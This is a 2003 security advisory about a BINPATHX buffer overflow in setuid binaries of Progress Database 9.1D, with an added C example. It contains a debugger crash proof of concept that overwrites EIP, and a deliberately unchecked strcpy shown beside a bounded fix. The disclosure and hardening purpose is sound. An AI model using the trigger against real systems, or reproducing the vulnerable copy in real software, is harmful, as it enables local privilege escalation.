16th Apr 2003 [SBWID-6160]
COMMAND
	Progress Database unchecked buffer in BINPATHX leads to overflow
SYSTEMS AFFECTED
	v9.1D up to 9.1D05
PROBLEM
	In Secure Network Operations, Inc. Strategic Reconnaissance Team
	advisory SRT2003-04-15-1029 [http://www.secnetops.com]:
	With version 9.1D several things have changed in the Progress codebase.
	One such change is the addition of the BINPATHX variable. At first
	glance the BINPATHX variable appears to tell Progress binaries where to
	find shared library files and other installation files. Unfortunately,
	while reading the variable no bounds checking is done. If an attacker
	supplies enough data an overflow will occur, thus overwriting critical
	memory registers including the eip.
	Debugger output
	
	rootme $ export BINPATHX=`perl -e 'print "A" x 240'`
	rootme $ gdb -q /usr/dlc/bin/_proapsv
	(gdb) r
	Starting program: /usr/dlc/bin/_proapsv
	Program received signal SIGSEGV, Segmentation fault.
	0x41414141 in ?? ()
	(gdb) bt
	#0  0x41414141 in ?? ()
	Cannot access memory at address 0x41414141
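
The flaw class described above, as an added example that is not taken from the advisory or from Progress code: a hypothetical unchecked copy of BINPATHX into a fixed buffer, beside a length-checked form. The buffer size and all function names are assumptions, since the advisory does not show the affected code.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BINPATH_MAX 128  /* assumed size; not stated in the advisory */

/* Flawed pattern (hypothetical reconstruction, never called here): the
 * value is copied into a fixed stack buffer without a length check, so a
 * long BINPATHX runs past the buffer into the saved return address. */
void load_binpath_unchecked(void)
{
    char path[BINPATH_MAX];
    const char *v = getenv("BINPATHX");
    if (v != NULL)
        strcpy(path, v);
    (void)path;
}

/* Bounded copy: measure first, refuse anything that does not fit with its
 * terminating NUL, and fail loudly instead of truncating a path silently.
 * Returns 0 on success, -1 with errno set on failure. */
int copy_bounded(char *dst, size_t dstlen, const char *src)
{
    size_t n;
    if (dst == NULL || dstlen == 0) { errno = EINVAL; return -1; }
    dst[0] = '\0';
    if (src == NULL) { errno = ENOENT; return -1; }
    n = strlen(src);
    if (n >= dstlen) { errno = ENAMETOOLONG; return -1; }
    memcpy(dst, src, n + 1);
    return 0;
}

int load_binpath_checked(char *dst, size_t dstlen)  /* hardened loader */
{
    return copy_bounded(dst, dstlen, getenv("BINPATHX"));
}

int main(void)
{
    char path[BINPATH_MAX];
    if (load_binpath_checked(path, sizeof path) != 0) {
        perror("BINPATHX rejected");
        return 1;
    }
    printf("BINPATHX accepted: %s\n", path);
    return 0;
}
```

With the 240-byte value from the debugger session, the checked loader returns an error instead of writing past the buffer.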
	
SOLUTION
	Install 9.1D05, or remove the setuid bit from all suid binaries (chmod -s).
	
	http://www.progress.com/patches/patchlst/91D-156v.htm